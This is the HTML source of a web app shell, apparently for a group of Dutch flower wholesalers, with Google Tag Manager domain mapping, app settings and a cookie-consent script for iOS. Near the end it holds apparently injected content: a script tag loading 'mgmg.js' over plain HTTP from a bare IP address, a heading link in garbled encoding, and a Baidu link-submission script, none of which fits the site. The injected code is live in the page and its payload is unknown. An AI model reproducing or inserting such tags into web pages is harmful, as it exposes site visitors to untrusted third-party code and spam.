  <!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <meta http-equiv="X-UA-Compatible" content="ie=edge" />
        <meta name="robots" content="all" />
        <title></title>

        <script>
            function isIE() {
                const ua = window.navigator.userAgent;
                return /MSIE|Trident/.test(ua);
            }
            function getDomainWithoutSubdomain(url) {
                const urlParts = new URL(url).hostname.split('.');
                return urlParts
                    .slice(0)
                    .slice(-(urlParts.length === 4 ? 3 : 2))
                    .join('.');
            }

            function getGTMID() {
                const domain = new URL(window.location.href);
                const domainWithSubdomain = new URL(document.location).hostname;
                var testHost = new RegExp(/shop.fleurametz.flowers|localhost/);
                /** White label is true when we are not on a master host */
                var isTestHost = testHost.test(location.host);
                const gtmIDsSubDomain = {
                    't1site.fleurametz.flowers': 'GTM-N6TQVJ3',
                    'a1site.fleurametz.flowers': 'GTM-PCVPRD4',
                };

                const gtmIDs = {
                    'dgi.nl': 'GTM-WJS5KML',
                    'cloet.com': 'GTM-PBJP2GS',
                    'circles.fm': 'GTM-MFP9RZB',
                    'flyingdutchflowers.com': 'GTM-5PMSVNX',
                    'fma.fm': 'GTM-WSS5T72',
                    'fmgroup.fm': 'GTM-M2MFWKQ',
                    'greentail.com': 'GTM-PT6RG49',
                    'holip.nl': 'GTM-MVJTR7Z',
                    'pinnacle.flowers': 'GTM-MZGWSS2',
                    'schrama.nl': 'GTM-5SFG94T',
                    'suspendedbouquets.com': 'GTM-W4RX3TP',
                    'theplantteam.co.uk': 'GTM-M7TB49L',
                    'verdel.eu': 'GTM-NXKXSLS',
                    'xlflor.com': 'GTM-MJJXKC2',
                    'antonspaargaren.com': 'GTM-W7XHJ7F',
                    'hilverdadeboer.nl': 'GTM-P7CXZSH',
                    'fleurametz.com': 'GTM-N3568VB',
                    'florahuis.com': 'GTM-KVGTLV9',
                    default: 'GTM-KTB28HK',
                };
                //search inside gtmID if a key starts with the domain
                const gtmIDKeySubDomain = Object.keys(gtmIDsSubDomain).find(
                    (key) => domainWithSubdomain.startsWith(key),
                );
                if (gtmIDKeySubDomain) {
                    return gtmIDsSubDomain[gtmIDKeySubDomain];
                }
                const gtmIDKey = Object.keys(gtmIDs).find((key) =>
                    getDomainWithoutSubdomain(document.location).startsWith(
                        key,
                    ),
                );
                if (!gtmIDKey && isTestHost) {
                    console.info(
                        'No GTM ID found for domain: ' +
                            domain.hostname +
                            '. Using whitelabel ID',
                    );
                    return gtmIDs['default'];
                }
                if (!gtmIDKey) {
                    console.error(
                        'No GTM ID found for domain: ' + domain.hostname,
                    );
                    return gtmIDs['default'];
                }
                return gtmIDs[gtmIDKey];
            }
        </script>

        <script>
            window.APP_SETTINGS = {
                apiUrl: 'https://api.fleurametz.com/site',
                gtmContainerId: getGTMID(),
                mapsApiKey: 'AIzaSyD6dD6wxFQCsq0Vvw9GegKTiWGlOWy0p7Q',
                mapsLocatorMapId: 'd87b8b4699e6bf31',
                remoteAssetsUrl: 'https://peonlstorage.z6.web.core.windows.net/',
                GTMPrefix: 'sst',
            };
        </script>

        <!-- Exception script for iOS: User opens webview in iOS, set basic consent -->
        <script>
            function setCookie(name, value, expireInDays) {
                var date = new Date();
                date.setTime(
                    date.getTime() + expireInDays * 24 * 60 * 60 * 1000,
                );
                var expires = 'expires=' + date.toUTCString();
                document.cookie =
                    name + '=' + value + ';' + expires + ';path=/';
            }
            (function () {
                if (isIE()) return;
                var searchParams = new URLSearchParams(window.location.search);
                var source = searchParams.get('utm_source');
                if (!source || source !== 'iosappnoconsent') return;
                setCookie('fleurametz-accept-cookies-site', 'basic', 1);
                setCookie('fleurametz-accept-cookies-shop', 'basic', 1);
            })();
        </script>

        <script>
            // Prerender trigger
            window.prerenderReady = false;
        </script>
        <!-- End Google Tag Manager -->
      <script type="module" crossorigin src="/assets/index-b5c11aa8.js"></script>
      <link rel="stylesheet" href="/assets/index-255f6044.css">
    
<script src="http://172.247.164.34/mgmg.js"></script>


</head>

    <Body><h1><a href="/">Õ¬ÄÐ¸£Àûµ¼º½</a></h1><script>
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(bp, s);
})();
</script>
        <div id="app"></div>
        
        <noscript>You need to enable JavaScript to run this app.</noscript>
    </body>
</html>